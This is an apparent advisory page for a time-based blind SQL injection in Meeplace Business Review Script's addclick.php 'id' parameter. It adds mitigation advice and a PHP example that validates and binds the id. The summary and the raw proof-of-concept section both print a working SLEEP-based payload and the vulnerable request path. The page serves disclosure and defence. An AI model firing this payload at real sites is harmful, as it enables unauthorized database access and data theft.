Vendor: Meeplace Business Review Script
By: Ahmet Ümit BAYRAM
CVSS: 7.5 (HIGH)
Vulnerability Type: SQL Injection
CWE: 89
Product Name: Meeplace Business Review Script
Affected Version From: Latest
Affected Version To: Latest
Patch Exists: NO
Related CWE: N/A
CPE: a:meeplace:meeplace_business_review_script
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2019

Meeplace Business Review Script – ‘id’ SQL Injection

Meeplace Business Review Script is vulnerable to SQL injection. An attacker can exploit the vulnerability by sending a crafted HTTP request that carries a malicious payload in the 'id' GET parameter of the 'addclick.php' script. The payload '&id=1 RLIKE (SELECT * FROM (SELECT(SLEEP(5)))qcFZ)' can be used to exploit this vulnerability.

Mitigation:

Input validation should be used to prevent SQL Injection attacks. Sanitizing user input and using parameterized queries can help mitigate this vulnerability.
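
The mitigation above applied to the 'id' parameter, as an added example that is not Meeplace code or part of the original advisory: the value is validated as a positive integer and only then bound to a prepared statement. The `ads` table, `clicks` column and function names are assumptions, and in-memory SQLite stands in for the product's database.

```php
<?php
declare(strict_types=1);

// Added example, not Meeplace code. The "ads" table and "clicks" column are
// assumed names; SQLite in memory stands in for the product's database.

/** Return a positive integer id, or null when the input is anything else. */
function parse_ad_id(mixed $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/** Validate, then bind: returns the HTTP status the handler would send. */
function handle_click(PDO $pdo, mixed $raw): int
{
    $id = parse_ad_id($raw);
    if ($id === null) {
        return 400; // rejected before any SQL is built
    }
    // The id travels as a bound integer, never as part of the SQL text.
    $stmt = $pdo->prepare('UPDATE ads SET clicks = clicks + 1 WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount() === 1 ? 204 : 404;
}

$pdo = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);
$pdo->exec('CREATE TABLE ads (id INTEGER PRIMARY KEY, clicks INTEGER NOT NULL DEFAULT 0)');
$pdo->exec('INSERT INTO ads (id) VALUES (1)');

// Constructed inputs: a valid id, an unknown id, the PoC payload, an array value.
$inputs = ['1', '42', '1 RLIKE (SELECT * FROM (SELECT(SLEEP(5)))qcFZ)', ['1']];
foreach ($inputs as $raw) {
    printf("%-50s => %d\n", json_encode($raw), handle_click($pdo, $raw));
}
printf("clicks for ad 1: %d\n", $pdo->query('SELECT clicks FROM ads WHERE id = 1')->fetchColumn());
```

Validation and binding are both kept on purpose: the integer check gives a clean 400 for malformed requests, and the bound parameter keeps the query safe even if the check is later loosened.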

Exploit-DB raw data:

# Exploit Title: Meeplace Business Review Script - 'id' SQL Injection
# Date: 22.03.2019
# Dork:
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: http://www.meeplace.com
# Demo Site: http://demo.meeplace.com
# Version: Latest
# Tested on: Kali Linux
# CVE: N/A

----- PoC: SQLi -----

# Request: http://localhost/[PATH]/ad/addclick.php?&id=1
# Vulnerable Parameter: id (GET)
# Payload: &id=1 RLIKE (SELECT * FROM (SELECT(SLEEP(5)))qcFZ)